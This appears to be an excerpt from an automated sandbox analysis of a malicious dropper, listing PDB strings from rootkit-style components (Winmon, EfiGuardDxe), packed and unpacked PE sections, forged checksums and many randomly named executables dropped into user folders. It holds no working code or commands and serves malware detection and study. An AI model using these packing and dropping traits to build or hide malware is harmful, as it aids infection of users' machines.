                    Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Window found: window name: TMainForm
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Loader.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: EfiGuardDxe.pdb7 source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.0000000000391000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000391000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000CD1000.00000040.00000001.01000000.00000024.sdmp
                    Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: `K_lib.dll.pdb@+ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: symsrv.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000C7A000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003599000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .exe.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb@+ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp
                    Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: `K_lib.dll.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Unable to locate the .pdb file in this location source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: The module signature does not match with .pdb signature. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .pdb.dbg source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: '(EfiGuardDxe.pdbx source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: symsrv.pdbGCTL source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000C7A000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003599000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: or you do not have access permission to the .pdb location. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: EfiGuardDxe.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .exe.pdb@ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb@ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.0000000000391000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000391000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000CD1000.00000040.00000001.01000000.00000024.sdmp
                    Source: Binary string: dbghelp.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: dbghelp.pdbGCTL source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe Unpacked PE file: 16.2.simplewebbuilder.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.short1:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Unpacked PE file: 22.2.syncUpd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe Unpacked PE file: 25.2.Ca4kQMpVXP8DY5HQ8cbuvFmH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe Unpacked PE file: 28.2.93gthV73eSBvEuNxXjo0G1yI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe Unpacked PE file: 32.2.eofj7Pf9I3ORdN1nDBhGJIZl.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe Unpacked PE file: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe Unpacked PE file: 37.2.Rk1pfEVtKjXZKi5E0UJ5igqM.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe Unpacked PE file: 46.2.h9Cux8w1auuBknjQZWKFquuD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe Unpacked PE file: 16.2.simplewebbuilder.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Unpacked PE file: 22.2.syncUpd.exe.400000.0.unpack
                    Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe Unpacked PE file: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack
                    Source: file.exe Static PE information: 0xAF428149 [Tue Mar 6 01:47:53 2063 UTC]
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 15_2_004502C0
                    Source: PYAjuaDlqLKzTVmA3BsThyOt.exe.4.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: dUxbeTroGHi03yY2SNfS5bOl.exe.4.dr Static PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: Y4LnHhMyiOb93nCmM4lvPIko.exe.4.dr Static PE information: real checksum: 0x2df335 should be: 0x2d6dda
                    Source: BQEn0lhfn4Y5OIYegdFv1wu3.exe.4.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: qvx2vm8LJ8TphvujtDcRyl5q.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: 9mAmsWjPEPtkITVqz02hZgXo.exe.4.dr Static PE information: real checksum: 0x2dfc0e should be: 0x2d76b3
                    Source: jUzz7ezNBFbkGCxJO9DOH9dj.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: ZT6AzWxWIFXd7OjNGkbd7Uza.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: bizN5UTpdWpltkCaYrvmwbQI.exe.4.dr Static PE information: real checksum: 0x2d9fde should be: 0x2e1a82
                    Source: VaASjTWoLMCHI6PCL8cSdHon.exe.4.dr Static PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: 8MN4Hb5Yz3QkTtMyZERbTpkY.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: UVZ0INMy369gioArueMwqIMb.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: fZDr3c80pCnwYiNsqew1ltFz.exe.4.dr Static PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: FnEWeb8TPMfAXv33KZpKVFTq.exe.4.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe.4.dr Static PE information: real checksum: 0x2d72ac should be: 0x2ded50
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe.4.dr Static PE information: real checksum: 0x2d7638 should be: 0x2df0dc
                    Source: JJGhmGOEefZp3FWJtWea5kYv.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: esF1MUrWaaVP5MG9h4MWEG3L.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: XgAVLWIvGKK9IeCrDuWuJavo.exe.4.dr Static PE information: real checksum: 0x2dfc0e should be: 0x2d76b3
                    Source: 4OwcyrblkGc2hCszHEHuZCPV.exe.4.dr Static PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: PvJ9KZy5kaC0ZzTLP46Ng6g6.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: sgtzC1bBRzEH97LXPXHm4FVd.exe.4.dr Static PE information: real checksum: 0x2d3582 should be: 0x2db026
                    Source: uu6kK0oC1Fx2nv3ruwv5SpiV.exe.4.dr Static PE information: real checksum: 0x2dc28e should be: 0x2d3d33
                    Source: XvEaDZrVEGhrm4VFfP27fZuD.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: gNNWpgxfSZev9CgAoQqZomFj.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: C83U8puVpwkXcWSHiHRNiMd6.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: oYJcrFAFnphIaAQPo8IrBCWh.exe.4.drStatic PE information: real checksum: 0x2dc28e should be: 0x2d3d33
                    Source: lUtN2EBQTg4XAhTAimO3WEPd.exe.4.drStatic PE information: real checksum: 0x2df335 should be: 0x2d6dda
                    Source: file.exeStatic PE information: real checksum: 0x0 should be: 0x16749
                    Source: HVNYeIaPfKI1PhwDbNEQTtKf.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: LHg0H4yHSfuTfUKbSoOyunge.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: vuP05YoHCo3Zp0Gv9gzt1k3R.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: MZK43d4eyhmNVFNhS9RLdaaU.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: zWNPblMz8jR3viBabeOSPbWa.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: ph6WaZo2QKdqQsAcLgEj5AUn.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: nUeK1cEoa1XzerepeCLGgwoc.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: byobdbFYFRrd9psjQQD2jS1U.exe.4.drStatic PE information: real checksum: 0x2d72ac should be: 0x2ded50
                    Source: gqqSecZ0iDGmpNUFqal8ttIk.exe.4.drStatic PE information: real checksum: 0x2d5e71 should be: 0x2dd915
                    Source: r5rrZo2uJpDKzb6r7Ao0yzpg.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: sMiDMUawiFqOcW9q4tC0ZctA.exe.4.drStatic PE information: real checksum: 0x2d5e71 should be: 0x2dd915
                    Source: bsQavSmX9wFQ2mntPGaltaow.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: gJVExh69UXMYc2ZOtdjmxeSQ.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: NuRMT0uazLQnmOJibnohOTUR.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: uYudt0flCl0e0fQZ8vnWLOhm.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: dxR7p0Pw8zQ312jALneLeimr.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: GzFms1Le87SMGeCC7Il4yqA4.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: meewdacxdZVSIEbNRUL5vYdZ.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: 8lHsEF0BGMRxgVNdr9FiuFje.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: EaLGCYiRQM2XOtVzyy0ADczF.exe.4.drStatic PE information: real checksum: 0x2d3582 should be: 0x2db026
                    Source: 04gOIpVzf7VOcPzY7ZRrzAhZ.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: 5TjWUMIFlYsM1w3seMz5vnCW.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: KF9G3AcCbu7Zl4IuQK8qDucc.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: HnpqZr8MiBteqHFNrwWZBXQR.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: CZMrbdv3aANr0IrdmBiWfjaH.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: 2A8JXH5ilBvpWPJYIqcYohVL.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: j9oiPedoYJq65MrsMIBEWZ24.exe.4.drStatic PE information: real checksum: 0x2d9fde should be: 0x2e1a82
                    Source: 2h93Z8eIGDBBod8joPEiBXPj.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: lsTOGQhYLrM0d7OftxaupYqW.exe.4.drStatic PE information: real checksum: 0x2dddde should be: 0x2d5883
                    Source: E6QKqd9T2KlIZuLZuluVgjTV.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_004065C8 push 00406605h; ret 14_2_004065FD
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_004040B5 push eax; ret 14_2_004040F1
